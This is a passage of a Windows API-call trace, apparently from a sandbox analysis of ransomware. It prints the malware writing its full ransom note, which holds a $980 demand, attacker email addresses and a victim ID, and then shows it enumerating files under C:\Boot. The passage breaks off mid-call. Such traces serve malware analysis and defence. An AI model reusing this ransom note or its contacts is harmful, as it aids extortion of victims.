us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.079] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.079] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.080] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.080] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.080] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.080] CloseHandle (hObject=0x5c8) returned 1 [0056.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.081] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eba8 | out: hHeap=0x660000) returned 1 [0056.081] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.081] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0056.081] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0056.081] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0056.081] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0056.081] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0056.081] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0056.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e630 [0056.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328d870 [0056.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eba8 | out: hHeap=0x660000) returned 1 [0056.081] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0056.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x38) returned 0x327ca80 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0056.082] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d870 | out: hHeap=0x660000) returned 1 [0056.082] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e630 | out: hHeap=0x660000) returned 1 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e630 [0056.082] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.082] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eba8 | out: hHeap=0x660000) returned 1 [0056.082] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x54) returned 0x3296380 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328d870 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee28 [0056.082] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec48 | out: hHeap=0x660000) returned 1 [0056.082] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269568 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e720 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.082] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa8) returned 0x3201650 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee28 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328d870 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eab8 [0056.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e860 [0056.083] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.083] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xfc) returned 0x3234418 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e720 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e450 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e8d8 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5b8 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee50 [0056.083] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e630 [0056.083] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e860 [0056.083] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16c) returned 0x9c7a8a0 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eab8 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328d870 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee28 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e478 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eb08 [0056.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eea0 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ea40 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ef18 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ecc0 [0056.084] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e630 [0056.084] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.084] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee50 [0056.084] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0056.084] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x214) returned 0x32995a0 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5b8 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e8d8 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e450 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec48 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e720 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9f0 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ea68 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0056.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e798 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee78 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e590 [0056.085] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e658 [0056.085] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e630 [0056.085] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eba8 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e860 [0056.085] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0056.085] RtlAllocateHeap (HeapHandle=0x660000, 